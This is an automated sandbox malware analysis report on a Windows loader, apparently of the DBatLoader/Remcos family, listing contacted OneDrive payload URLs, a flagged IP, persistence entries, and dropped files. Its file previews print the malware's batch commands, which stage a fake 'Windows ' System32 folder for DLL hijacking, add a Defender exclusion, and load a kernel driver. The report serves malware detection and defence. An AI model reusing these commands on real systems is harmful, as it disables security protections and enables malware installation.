http://ocsp.sectigo.com0	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
http://www.microsoft.	Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0d(	Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/	PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com:443/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI	Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWB	PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com/	PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/	PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com/y4m_0zffjQKuzcWV-4RzvUr745PZwF21rnv86bmrYUTERnhgMrc3IjhKSzlEeoFvlew	Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/#	Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com:443/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWD	Akaelkov.PIF, 00000008.00000002.2236274248.000000000093E000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/c#	Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000905000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.verisign.	PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://live.com/&	Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vokleakA.pif, 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com/y4mwHuOHrKe-2pkzFSdtlFI_dWIyQPnyES3yKggJ0j1NfQxFwS0bEZy-I6gOyWDAEQA	Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000942000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypeqqw.sn.files.1drv.com/y4mu4Z1NRH3ttdRusRHzE_iL9RsVmfGh0diSajIfz1Wvx3WSkuRSeIcn76go1fI4MM8	Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0C	PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=	Akaelkov.PIF, 00000008.00000002.2247159296.0000000017CB0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.pmail.com0	PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
150.171.43.11	dual-spov-0006.spov-dc-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
139.84.229.159	unknown	United States		16498	LASALLEUS	true

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379527
Start date and time:	2024-01-23 14:32:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PCMNil7wkU.exe renamed because original name is a hash value
Original Sample Name:	344c9c0f72c535e334a4b605212c69d9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@13/12@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 88% Number of executed functions: 107 Number of non-executed functions: 190
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.42.12, 72.21.81.240
Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, wu.ec.azureedge.net, odc-sn-files-geo.onedrive.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: PCMNil7wkU.exe

Simulations

Behavior and APIs

Time	Type	Description
14:32:49	API Interceptor	2x Sleep call for process: PCMNil7wkU.exe modified
14:32:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Akaelkov C:\Users\Public\Akaelkov.url
14:33:00	API Interceptor	2x Sleep call for process: vokleakA.pif modified
14:33:05	API Interceptor	2x Sleep call for process: Akaelkov.PIF modified
14:33:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Akaelkov C:\Users\Public\Akaelkov.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
150.171.43.11	https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELA	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkW	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/c/104cf0615741e2d5/EXTuT5BucDJMnjbDCsUAOQEBZObCLdRF3lcopYmt7UCzZw	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/c/2367a926d3e76ff5/EdSjhpSXNIZLjlZm5uxzCe8Br8hlzv3SD5dyUTUvqsDHSg	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/s!BGMfJoMNhVyWhNsYof1fW2Os2-MFKg?e=17bwefQAtkWLf00fLUAM8g&at=9	Get hash	malicious	Unknown	Browse
139.84.229.159	DOC9087.exe	Get hash	malicious	AsyncRAT	Browse
	PO301.exe	Get hash	malicious	AsyncRAT, zgRAT	Browse
	Details.exe	Get hash	malicious	DBatLoader, Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-dc-msedge.net	https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELA	Get hash	malicious	Unknown	Browse	150.171.43.11
	https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkW	Get hash	malicious	Unknown	Browse	150.171.43.11
	SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.41.11
	https://1drv.ms/b/c/104cf0615741e2d5/EXTuT5BucDJMnjbDCsUAOQEBZObCLdRF3lcopYmt7UCzZw	Get hash	malicious	Unknown	Browse	150.171.43.11
	https://1drv.ms/b/c/2367a926d3e76ff5/EdSjhpSXNIZLjlZm5uxzCe8Br8hlzv3SD5dyUTUvqsDHSg	Get hash	malicious	Unknown	Browse	150.171.43.11
	https://1drv.ms/b/s!BGMfJoMNhVyWhNsYof1fW2Os2-MFKg?e=17bwefQAtkWLf00fLUAM8g&at=9	Get hash	malicious	Unknown	Browse	150.171.43.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	bTgf.exe	Get hash	malicious	Njrat	Browse	20.234.71.164
	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	https://masterengineers-my.sharepoint.com/:b:/g/personal/tcampbell_masterengineersinc_com/EdIYTGk86nZNgJT4VeyaGccB0h74Yw7dfJzxPtqNYjG_Xg?e=4%3aMZuLFd&at=9	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	http://www.thewiseseeker.com	Get hash	malicious	Unknown	Browse	13.107.213.40
	file.exe	Get hash	malicious	Amadey, Fabookie, RedLine, RisePro Stealer, Stealc	Browse	40.71.99.188
	GLAS_DeploymentMatrix_Full_25358_20240118_024413_Mauffrey 1.xlsm	Get hash	malicious	Unknown	Browse	13.107.219.40
	http://timelessbeautylessons.com	Get hash	malicious	Unknown	Browse	13.107.213.40
	https://spectrumpaint.atlassian.net/wiki/external/ZTZiNjUxYzcwM2FjNGI0OGE1NWMwMzVkMmYwMDBlYmM	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	nNEZw5ErnG.xlsm	Get hash	malicious	Unknown	Browse	13.107.227.41
	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b%2C8d23fb3%2C492093b&p1=//ammuchee.com/info/tech/qwertyshshdjdjdjdncnchdjdeieujdjdndncmvnvnbdsjksjhdheyjdndncmcncnc/sjsksjdjdhdncnchdheyeudjdkdkdmcmcckdjgsgshdbdndjcndnjdjdjssbcnchdhsj/ilqlhsjblifgnsbvfzktoqmecnhlsygugqcuuisqkcdfbuejzvhnfndkiqoxmujypeooogotvvcaotxduopphebsnahcpgqmnjfk/#.zfsnx.bWFsZ29yemF0YS56dXJla0BEZWVaZWUucGw=	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
LASALLEUS	o3I77gL589.exe	Get hash	malicious	Nanocore	Browse	139.84.228.75
	sk3v96prYe.elf	Get hash	malicious	Unknown	Browse	139.84.219.126
	DOC9087.exe	Get hash	malicious	AsyncRAT	Browse	139.84.229.159
	PO-#302651_Schrameyer-Bestellung.scr.exe	Get hash	malicious	Remcos, DBatLoader	Browse	139.84.139.29
	PO_142023_December_final_order.scr.exe	Get hash	malicious	Remcos	Browse	139.84.139.29
	PO301.exe	Get hash	malicious	AsyncRAT, zgRAT	Browse	139.84.229.159
	aofu9GeDAo.exe	Get hash	malicious	Nanocore, zgRAT	Browse	139.84.139.29
	Details.exe	Get hash	malicious	DBatLoader, Remcos	Browse	139.84.229.159
	SecuriteInfo.com.Trojan.GenericKD.69224191.30044.24123.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	139.84.231.199
	https://cdn.discordapp.com/attachments/845913372713156622/1147258627971878992/Payment_83641.zip	Get hash	malicious	DarkComet	Browse	139.84.139.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	150.171.43.11
	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.43.11
	PO0124.docx.doc	Get hash	malicious	Unknown	Browse	150.171.43.11
	file.exe	Get hash	malicious	Amadey, Fabookie, RedLine, RisePro Stealer, Stealc	Browse	150.171.43.11
	GLAS_DeploymentMatrix_Full_25358_20240118_024413_Mauffrey 1.xlsm	Get hash	malicious	Unknown	Browse	150.171.43.11
	nNEZw5ErnG.xlsm	Get hash	malicious	Unknown	Browse	150.171.43.11
	la0vsPpNBi.exe	Get hash	malicious	LummaC	Browse	150.171.43.11
	file.exe	Get hash	malicious	LummaC, zgRAT	Browse	150.171.43.11
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.43.11
	file.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	150.171.43.11

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\netutils.dll	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
C:\Users\Public\Libraries\easinvoker.exe	SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SCAN_DSC0027929829.PDF..exe	Get hash	malicious	Remcos, DBatLoader	Browse
	DF0987890000.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Stmt_2024-01.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	Invoice0017861201.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Order151smapl.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	n6dS0UI5yA.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe	Get hash	malicious	DBatLoader	Browse
	HG098657890000090.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe	Get hash	malicious	Remcos, DBatLoader	Browse

Created / dropped Files

C:\Users\Public\Akaelkov.url

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Akaelkov.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.061467880199451
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM9AKGOsb+Uo0Pbyn:HRYFVmTWDyzmAGErbu
MD5:	CB88BB372A963D0E8F5EF7BD83D853B7
SHA1:	58ACB2C46E66F74252C2DC3365A66CE2923CA428
SHA-256:	7E3105CD8CDAD213F0D7C46C68AA7A04709123015C86D03C94E442962EBE1849
SHA-512:	B4A36067CB8C5AA76C3E71E0D488B8FDB1F8B9CF4949239DA6B58FA8B01E0E757898337B541D89837B5CF35854B389E6CBC8A6C8BD13E703AC41D3A9F73B99C5
Malicious:	false
Reputation:	low
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Akaelkov.PIF"..IconIndex=61..HotKey=46..

C:\Users\Public\Libraries\Akaelkov.PIF

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1743360
Entropy (8bit):	7.502655957593833
Encrypted:	false
SSDEEP:	24576:ABOzHk9lBOQdkm5UfwauFL3WlrpY7Gv1eeajEja3KgffHCx2GwVT6ltVIaH3+j:AwyBmm5VXL3WZ7vcVjEvGHaKV2FJ3+j
MD5:	344C9C0F72C535E334A4B605212C69D9
SHA1:	952E1B506659A4113B2EB0857DBB86EE08E043A5
SHA-256:	5664820279AA20D408C82998BFF07AB34C0986124B09E9EF2025C73686C77F4F
SHA-512:	A0E787755A38B2F3DE72F17530B8AB6893DB498C50A957DF17CE16945B661E5DAEA648B3936267660A35478AC127A125A78C5F53099451E6950488198D204BA5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.............................'.......0....@..........................0...................@.............................. &.......d...................P..0o...........................@......................@................................text............................... ..`.itext....... ...................... ..`.data........0......................@....bss....X6...............................idata.. &.......(..................@....tls....4....0...........................rdata.......@......................@..@.reloc..0o...P...p..................@..B.rsrc....d.......d...6..............@..@.............0......................@..@................................................................................................

C:\Users\Public\Libraries\AkaelkovO.bat

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	404
Entropy (8bit):	5.010767804598093
Encrypted:	false
SSDEEP:	6:rT4etMs2cLv0Y/T2cLZ9ULT2cLZthGKFIs2cLZXIs2cLZWKmxkv:f4etMXK0Yi5L60GeWbRKZv
MD5:	6880148D6CD8FABDCE94B7E91DBD8D17
SHA1:	870E9AD13355A8452746E0904D004EE8C8EC66E5
SHA-256:	0BFE311FFB1DE96CBB2616C2A59C2A1A4942EC03073CC2DDFDFC43F79C74D18A
SHA-512:	810EE2896597CBCF813B9285BB2D7F9127360A4D8A872C47460D32710FE114C27ED58F840DC8BCFDAF7B826E7E46C78C0E814E4FA3D380D10737673A1FEBF38E
Malicious:	false
Reputation:	low
Preview:	start /min cmd /c mkdir "\\?\C:\Windows " &..mkdir "\\?\C:\Windows \System32" &..ECHO F\|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y &..ECHO F\|xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y &.."C:\\Windows \\System32\\easinvoker.exe" &..EXIT ......

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	271
Entropy (8bit):	4.820351746235622
Encrypted:	false
SSDEEP:	6:rYGnyiMMQ75ieGgdEYlRALolXlXINbaH1BYPWND1Qozn:8GnGMQ7hu+m2XlXI+BYONe2
MD5:	D62B11DC4DC821EF23260E5B0E74A835
SHA1:	CDFF2004CB9EF149F75FAE296F50F4FBFEFB2E84
SHA-256:	D1B19B878A3AE98F650843314CC3EF8D681013F6E18E0201CB47A0AFA45FC349
SHA-512:	27B8292EB318413B965E1C7552165E65F9003D03B15DDC0C5C142420A1A174303F983C268942D7B60C74AC4E8E79E01F83510807FC0C492CABDF4948BC69C625
Malicious:	false
Reputation:	low
Preview:	start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & ..sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &..sc.exe start truesight &..exit....

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Ovn:Ovn
MD5:	89B289543B1801050A1FA5F665682F9B
SHA1:	F01FC9F97420AD6AEAF09BE80D1D9BA5B69C4A19
SHA-256:	ABCA10E5C0FF2B657C09CD50D7AA667175FE7A1402550D6C43547EBF49FA71D6
SHA-512:	216E44DAC574B670E8BDE073574316C58145C7AF6A89506534FE67E82C3D4DFDC5EBE39AC9C13181C6EC1F846ECB9ABADAAB6BD9FB7C3F03AE3524223D79733A
Malicious:	false
Reputation:	low
Preview:	86..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse Filename: DF0987890000.scr.exe, Detection: malicious, Browse Filename: Stmt_2024-01.exe, Detection: malicious, Browse Filename: Invoice0017861201.exe, Detection: malicious, Browse Filename: Order151smapl.exe, Detection: malicious, Browse Filename: n6dS0UI5yA.exe, Detection: malicious, Browse Filename: Haziran-Aral#U0131k_Eksik_Evrak_Raporu.exe, Detection: malicious, Browse Filename: HG098657890000090.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	117430
Entropy (8bit):	5.039733311717682
Encrypted:	false
SSDEEP:	1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
MD5:	96B99E2A886D816C1B98B018ADFE6311
SHA1:	41F2F29BD8F366781ED1387068150EB2789DBBF8
SHA-256:	C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
SHA-512:	6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse Filename: DF0987890000.scr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Libraries\truesight.sys

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53696
Entropy (8bit):	6.830243356027624
Encrypted:	false
SSDEEP:	768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
MD5:	F53FA44C7B591A2BE105344790543369
SHA1:	363068731E87BCEE19AD5CB802E14F9248465D31
SHA-256:	BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
SHA-512:	55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......\|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............\|..............@..B........................................................................................................................................................................................

C:\Users\Public\Libraries\vokleakA.pif

Download File

Process:	C:\Users\user\Desktop\PCMNil7wkU.exe
